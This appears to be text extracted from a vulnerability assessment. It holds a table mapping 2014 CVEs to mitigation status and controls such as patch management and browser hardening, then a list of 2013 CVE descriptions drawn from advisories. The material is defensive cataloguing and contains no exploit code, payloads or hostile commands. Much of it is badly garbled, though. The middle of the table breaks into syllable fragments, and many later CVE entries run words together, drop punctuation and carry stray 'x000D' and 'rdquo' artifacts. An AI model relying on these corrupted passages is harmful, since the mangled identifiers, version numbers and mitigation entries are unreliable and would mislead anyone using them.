CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated | Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall Anti DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated | Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated | Firewall Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall Anti-Dos, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated | Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y |  | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-7 |  |  |  |  |  |  |  | 

25

0n

yy

nn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lP

atch

Man

agem

ent

CV

E-2

01

4-7

92

7y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lS

ecu

reC

on

fig

ura

tio

n(A

cces

sC

on

tro

l)

Pat

chM

anag

emen

tC

VE

-20

14

-79

45

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

Pat

chM

anag

emen

tC

VE

-20

14

-84

47

yy

yy

nN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag

emen

tC

VE

-20

14

-86

38

yy

yy

yN

ot

Mit

igat

edM

itig

ated

-W

ebsi

teB

lack

listi

ng

S

ecu

reC

on

fig

ura

tio

n(S

ecu

reB

row

ser)

P

atch

Man

agem

ent

CV

E-2

01

4-8

83

5y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

CV

E-2

01

4-9

15

9y

yy

yy

No

tM

itig

ated

Par

tial

lyM

itig

ated

-A

nti

-Mal

war

eP

atch

Man

agem

ent

[Tim

eD

elay

]C

VE

-20

14

-91

63

yy

yy

yN

ot

Mit

igat

edP

arti

ally

Mit

igat

ed-

An

ti-M

alw

are

Pat

chM

anag

emen

t[T

ime

Del

ay]

CV

E-2

01

4-9

35

0y

yy

yn

No

tM

itig

ated

Mit

igat

ed-

Fir

ewal

lA

nti

-Do

sF

irm

war

eU

pd

ates

CV

E-2

01

4-9

35

7n

nn

nn

No

tM

itig

ated

Par

tial

lyM

itig

ated

-P

atch

Man

agem

ent

An

ti-M

alw

are

Sec

ure

Co

nfi

gu

rati

on


CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability".

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability".

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability".

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.


CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability", a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to /filesystem.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo

CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service

CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors

CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors

CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674

CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975

CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521

CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139

CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622

CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors

CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx

CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement

CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse

CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors

CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo

CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate

CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow

CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site

CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880

CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902

CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227

CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

